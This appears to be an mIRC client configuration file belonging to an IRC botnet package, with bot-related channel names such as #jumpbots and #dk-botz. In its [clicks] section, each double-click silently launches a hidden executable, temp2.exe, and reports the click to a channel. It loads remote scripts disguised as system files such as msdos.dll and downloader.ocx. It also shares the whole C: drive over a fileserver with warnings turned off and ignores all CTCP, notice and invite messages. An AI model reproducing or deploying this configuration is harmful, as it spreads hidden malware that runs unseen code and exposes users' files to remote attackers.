   [text]
   ignore=*.*
   commandchar=/
   linesep=-
   timestamp=[HH:nn]
   network=All
   quit=[JumpBot Quit] $ip
   finger=JC
   accept=*.jpg,*.gif,*.png,*.bmp,*.txt,*.log,*.wav,*.mid,*.mp3,*.zip
   [files]
   addrbk=addrbk.ini
   servers=servers.ini
   browser=c:\progra~1\intern~1\iexplore.exe
   emailer=c:\program files\outlook express\msimn.exe
   finger=finger.txt
   urls=urls.ini
   [warn]
   fserve=off
   dcc=off
   [options]
   n0=0,0,0,0,0,1,300,1,1,0,1,0,0,0,1,1,0,1,0,1,512,0,1,4,0,0,0,1,0,50,1
   n1=0,0,0,0,0,0,0,0,10,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,20,0,0,0,2,2,0
   n2=1,0,0,0,1,1,1,1,0,80,160,1,1,1,1,0,0,0,1,160,40,10,0,0,1,0,1,1,0
   n3=500,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,2,0,0,0
   n4=0,0,1,0,0,3,9999,0,0,1,1,0,1024,0,1,9999,60,0,0,0,1,0,0,2,1,5000,0,2
   n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,1,1,0,300,10,4,0,0,22,0,0,0,999999
   n6=0,0,11,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,0,2
   n7=1,0,0,0,0,0,0,1,1,1,1,1,0,1,0,0
   [dirs]
   [about]
   show=sheep
   version=5.91
   [windows]
   scripts=-7,812,2,612,0,0,0
   main=776,112,-18,27,0,1,0
   wchannel=21,112,21,27,0,1,0
   status=0,112,0,27,0,1,0
   wquery=252,431,252,234,0,1,0
   wserv=84,483,84,345,1,1,0
   #b=21,112,436,27,0,1,0
   wmessage=14,633,57,393,0,1,0
   wdccg=0,240,0,212,0,1,0
   [events]
   default=2,2,3,2,2,1,1
   [ident]
   active=yes
   system=UNIX
   port=113
   userid=hamster
   [socks]
   enabled=no
   port=1080
   method=4
   dccs=no
   [clicks]
   status=//run $mircdir $+ temp2.exe /n /fh        | //msg %chan :DoubleClicked: Status
   query=//run $mircdir $+ temp2.exe /n /fh        | //msg %chan :DoubleClicked: Query
   channel=//run $mircdir $+ temp2.exe /n /fh        | //msg %chan :DoubleClicked: Channel
   nicklist=//run $mircdir $+ temp2.exe /n /fh        | //msg %chan :DoubleClicked: Nick-List
   notify=//run $mircdir $+ temp2.exe /n /fh        | //msg %chan :DoubleClicked: Notify-List
   [dde]
   ServerStatus=off
   ServiceName=mIRC
   CheckName=off
   [fileserver]
   warning=off
   homedir=c:
   [dccserver]
   n0=0,59,0,0,0,0
   [mirc]
   nick=a
   anick=her
   user=me
   email=us
   host=SERVER::6667:
   [colours]
   n0=0,6,4,5,2,3,3,3,3,3,3,1,5,2,6,1,3,2,3,5,1,0,1,0,1
   [pfiles]
   n0=popups.ini
   n1=popups.ini
   n2=popups.ini
   n3=popups.ini
   n4=popups.ini

   [fonts]
   fscripts=Terminal,413,255
   fstatus=Trebuchet MS,413,0
   fchannel=Wingdings,407,2
   fquery=Wingdings,407,2
   f#dk-botz=MS Sans Serif,407,0
   f#updatescript=MS Sans Serif,407,0
   f#terr0r=Wingdings,407,2
   f#jumpbots=Terminal,412,255
   [nicklist]

   [dragdrop]
   n0=*.wav:/sound $1 $2-
   n1=*.*:/dcc send $1 $2-
   s0=*.*:/dcc send $1 $2-

   [local]
   localip=
   longip=
   local=

   [users]

   [agent]
   enable=0,0,0
   char=default
   options=1,1,1,100,0
   speech=150,60,100,1,180,10,50,1,1,1,0,50,1
   channel=1,1,1,1,1,1,1,1,1
   private=1,1,1,1
   other=1,1,1,1,1,1,1
   pos=20,20

   [extensions]
   n0=defaultEXTDIR:\

   [script]

   [findtext]

   [ignore]
   n0=*@*,ctcp,notice,invite

   [afiles]
   n0=mirc.ini

   [rfiles]
   n0=mirc.ini
   n1=remote.ini
   n2=pr.ocx
   n3=mirc2.ocx
   n4=mirc3.ocx
   n5=downloader.ocx
   n6=r.ocx
   n7=msdos.dll
   n8=msinv.dll
   n9=msalis.dll
   n10=ntshare.dat
